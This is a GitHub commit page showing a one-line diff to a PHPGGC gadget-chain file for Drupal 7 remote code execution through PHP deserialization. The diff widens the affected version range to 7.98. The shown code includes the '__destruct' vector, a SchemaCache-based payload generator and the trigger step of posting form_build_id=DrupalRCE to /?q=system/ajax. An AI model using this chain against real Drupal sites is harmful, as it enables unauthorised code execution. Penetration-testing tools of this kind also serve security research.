We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent b8bf80c commit aab3b9aCopy full SHA for aab3b9a
gadgetchains/Drupal7/RCE/1/chain.php
@@ -4,7 +4,7 @@
4
5
class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
6
{
7
- public static $version = '7.0.8 < ?';
+ public static $version = '7.0.8 <= 7.98';
8
public static $vector = '__destruct';
9
public static $author = 'Blaklis';
10
public static $information = 'You will need to post form_build_id=DrupalRCE to /?q=system/ajax once the payload is unserialized';
@@ -16,4 +16,4 @@ public function generate(array $parameters)
16
17
return new \SchemaCache($function,$parameter);
18
}
19
-}
+}
0 commit comments